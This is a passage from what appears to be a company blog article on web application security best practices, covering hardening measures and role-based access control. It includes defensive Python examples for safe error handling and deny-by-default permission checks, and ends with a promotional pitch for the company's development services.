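The following added example (not Simform's code) wraps a request handler so that expected, client-caused failures get a specific 400, while anything unexpected is logged server-side under a correlation ID and answered with a generic 500 carrying only that ID. The handler, request shape and simulated database error are constructed for the demonstration.

```python
import logging
import uuid

# Example code added for this article. A fail-safe handler wrapper: detail goes
# to the log, a generic message plus a reference ID goes to the client.
log = logging.getLogger("app")


class ValidationError(Exception):
    """Expected, client-caused failure: safe to describe to the user."""


def safe_handler(fn):
    def wrapper(request: dict) -> dict:
        try:
            return {"status": 200, "body": fn(request)}
        except ValidationError as e:
            return {"status": 400, "body": {"error": str(e)}}
        except Exception:
            ref = uuid.uuid4().hex[:12]
            # Full traceback, with the reference, for operators only.
            log.exception("unhandled error ref=%s path=%s", ref, request.get("path"))
            # No stack trace, SQL text, host names or library versions reach the client.
            return {"status": 500,
                    "body": {"error": "Something went wrong. Please retry later.",
                             "ref": ref}}
    return wrapper


@safe_handler
def withdraw(request: dict) -> dict:
    """Constructed endpoint: validates the amount, then 'talks to the database'."""
    amount = request.get("amount")
    if not isinstance(amount, int) or isinstance(amount, bool) or amount <= 0:
        raise ValidationError("amount must be a positive integer")
    if request.get("simulate_db_failure"):   # stands in for a real driver error
        raise RuntimeError("OperationalError: connection to server at 10.0.0.12 refused")
    return {"withdrawn": amount}
```

Support staff can ask the user for the `ref` value and find the full traceback in the log; the client never learns the database host, driver or query, which is exactly the information the original error message would have leaked.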

10. Enforce security hardening measures

Some components in your web application ecosystem need an extra layer of protection beyond the defaults. That is what we call security hardening. Here are a few hardening measures:

  • Add a Content Security Policy: CSP is an HTTP response header that tells the browser which origins it may load scripts, styles, images and frames from, and whether inline scripts are allowed. A strict policy blunts cross-site scripting: even if an attacker gets markup into a page, the injected script is refused.
  • Define a maximum script execution time: This limits how long a single request's script may run on the web server. Keep it as low as your application allows; a runaway or deliberately slow request then cannot tie up a worker indefinitely, which limits denial-of-service and resource-exhaustion attacks.
  • Disable unused modules: Disable modules or extensions on your web server that are not in use. It dramatically reduces the attack surface and leaves fewer components for attackers to find vulnerabilities in.

11. Utilize authentication and role-based access control

When building a web application, implement sound authentication and account management practices: strong password policies, secure password recovery flows, and multi-factor authentication.

Another thing to consider is role-based access control (RBAC) built on the principle of least privilege. The goal is to grant users as few privileges as possible. For example, an average user should not have access to the admin panel or security configuration.

Define roles for the various types of users in your ecosystem and the level of privilege you grant each, with "no permission" as the default for anything not explicitly listed. This reduces the attack surface and makes it harder for an attacker who compromises one account to reach sensitive data. Lastly, protect credentials and other sensitive information with account lockouts, TLS on every connection, and breached-password checks; periodic forced password expiration is now discouraged by NIST SP 800-63B except when compromise is suspected.
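The following added example (not Simform's code) shows the deny-by-default RBAC shape described above: roles map to explicit permission sets, each endpoint declares the single permission it needs, and an unknown role or a missing permission is refused. The roles, permissions and endpoints are constructed for the demonstration.

```python
from functools import wraps

# Example code added for this article. Constructed role table: a role that is
# not listed here grants nothing, and a permission not listed is never granted.
ROLE_PERMISSIONS = {
    "viewer": {"report:read"},
    "editor": {"report:read", "report:write"},
    "admin":  {"report:read", "report:write", "user:manage", "security:configure"},
}


class PermissionDenied(Exception):
    pass


def has_permission(user: dict, permission: str) -> bool:
    """True if any of the user's roles carries the permission; default deny."""
    return any(permission in ROLE_PERMISSIONS.get(role, set())
               for role in user.get("roles", []))


def require(permission: str):
    """Decorator: the endpoint states what it needs; the check is not optional."""
    def decorator(fn):
        @wraps(fn)
        def wrapper(user: dict, *args, **kwargs):
            if not has_permission(user, permission):
                raise PermissionDenied(f"{permission} required")
            return fn(user, *args, **kwargs)
        return wrapper
    return decorator


@require("report:read")
def read_report(user: dict, report_id: int) -> str:
    return f"report {report_id}"


@require("security:configure")
def update_security_settings(user: dict, settings: dict) -> str:
    return f"updated {sorted(settings)} by {user['name']}"
```

Keep the role table in one place and review it the way you review code; the common failure is not a wrong check on an endpoint but an "admin" role that has quietly accumulated every permission.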

How can Simform Help?

By now, you must’ve realized how critical it is to have a competent development team at your disposal to keep web application security issues at bay. They help you create sound web applications in the first place rather than having to patch security holes later.

Simform has been acting as an extended team for organizations worldwide and has provided them with advanced and sound products for more than a decade. Our seasoned developers continuously strive to keep themselves updated with cybersecurity developments and transfer this knowledge to your software builds.

On top of that, our clients can't speak highly enough of our transparency and adherence to quality standards. We are the one-stop solution for all your security, quality, and budget-related concerns in web application development. Feel free to reach out and get a free consultation on your future development needs.


With 10+ years in consumer and enterprise mobility, Hardik leads large-scale mobility programs covering platforms, solutions, governance, standardization and best practices.
